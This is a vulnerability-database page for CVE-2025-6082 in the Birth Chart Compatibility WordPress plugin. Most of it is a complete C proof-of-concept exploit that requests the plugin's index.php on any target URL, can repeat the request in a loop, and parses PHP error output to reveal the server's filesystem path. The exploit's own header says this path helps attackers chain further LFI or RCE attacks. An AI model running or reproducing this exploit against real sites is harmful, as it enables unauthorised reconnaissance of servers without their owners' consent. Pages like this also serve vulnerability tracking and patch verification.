Vulners
Lucene search
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Exploit for CVE-2025-6082 | 22 Jul 202515:38 | – | githubexploit |
 | CVE-2025-6082 | 22 Jul 202515:15 | – | circl |
 | WordPress plugin Birth Chart Compatibility 信息泄露漏洞 | 22 Jul 202500:00 | – | cnnvd |
 | WordPress Birth Chart Compatibility plugin Information Disclosure Vulnerability | 25 Jul 202500:00 | – | cnvd |
 | CVE-2025-6082 | 22 Jul 202509:22 | – | cve |
 | CVE-2025-6082 Birth Chart Compatibility <= 2.0 - Unauthenticated Full Path Exposure | 22 Jul 202509:22 | – | cvelist |
 | EUVD-2025-22302 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-6082 | 22 Jul 202510:15 | – | nvd |
 | WordPress Birth Chart Compatibility 2.0 Path Disclosure | 19 Aug 202500:00 | – | packetstormnews |
 | WordPress Birth Chart Compatibility plugin <= 2.0 - Unauthenticated Full Path Exposure vulnerability | 21 Jul 202522:18 | – | patchstack |
10
/*
* Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-6082
* Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/
* Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the
* “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends
* an HTTP GET request to the plugin’s index.php endpoint, captures
* the resulting PHP warning or fatal error, and parses the server’s
* filesystem path (e.g. “/var/www/html/wp-content/plugins/…” or
* “C:\\xampp\\htdocs\\…”). Revealing this path aids attackers in
* chaining further LFI/RCE or reconnaissance attacks.
*/
#include<stdio.h>
#include"argparse.h"
#include<string.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <unistd.h>
#define FULL 2300
const char *url = NULL;
const char *cookies=NULL;
int selecetCookie = 0;
int verbose = 0;
void exitSyscall()
{
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
const char *keyFound[] =
{
"Warning:",
"Fatal error:",
"/var/www/",
"C:\\xampp\\"
};
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
exitSyscall();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
void showPath(const char *targetUrl)
{
char full[FULL];
CURLcode curlCode;
struct Mem response = {NULL, 0};
CURL *curl = curl_easy_init();
if (curl == NULL)
{
exitSyscall();
}
response.buffer = NULL;
response.len = 0;
if (verbose)
{
printf("==========================================\e[0m\n");
printf("[+] Cleaning Response...\e[0m\n");
printf("[+] Response Buffer : %s\e[0m\n", response.buffer);
printf("[+] Response Len : %zu\e[0m\n", response.len);
printf("==========================================\e[0m\n");
}
fflush(stdout);
if (curl)
{
snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
if (selecetCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
sleep(1);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html");
h = curl_slist_append(h,
"Accept-Encoding: gzip");
h = curl_slist_append(h,
"Accept-Language: en-US,en");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
long httpCode = 0;
curlCode = curl_easy_perform(curl);
if (curlCode == CURLE_OK)
{
printf("---------------------------------------------------------------------------------------\n");
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl);
printf("\e[1;33m[+] Full Format Url : %s\e[0m\n",full);
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
&httpCode);
int numberKey = sizeof(keyFound) / sizeof(keyFound[0]);
if (httpCode >= 200 && httpCode < 300)
{
printf("[+] Http Code (200 < 300) !\e[0m\n");
printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode);
printf("\e[1;35m====================================[Response]====================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
printf("\e[1;35m===================================================================================\e[0m\n\n");
for (int k = 0; k < numberKey; k++)
{
const char *found = strstr(response.buffer, keyFound[k]);
if (found)
{
printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]);
printf("\e[1;34m[+] Context: %.100s\e[0m\n", found);
}
}
}
else
{
printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode);
printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n");
printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl);
if (verbose)
{
printf("\e[1;35m====================================[Response]====================================\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
printf("\e[1;35m===================================================================================\n\n");
}
}
}
else
{
printf("\e[1;31m[-] The request was not sent !\e[0m\n");
if (verbose)
{
printf("\e[1;31m[-] Exit Syscall ...\e[0m\n");
}
printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode));
exitSyscall();
}
}
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
curl_easy_cleanup(curl);
}
int main(int argc,
const char **argv)
{
printf
(
"\e[1;91m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▙▌█▌▙▌▙▖ \n"
"\e[1;97m\t Byte Reaper\e[0m\n"
);
printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n");
int loop = 0;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Target Url (Base Url)"),
OPT_STRING('c',
"cookies",
&cookies,
"cookies File"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_INTEGER('f',
"loop",
&loop,
"For loop (Request) (Ex : -f 10)"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!url)
{
printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n");
printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n");
exitSyscall();
}
if (verbose)
{
verbose=1;
}
if (cookies)
{
selecetCookie = 1;
}
if (loop)
{
for (int o = 0; o < loop ; o++)
{
showPath(url);
}
}
showPath(url);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Aug 2025 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 3.15.3
EPSS0.05393
SSVC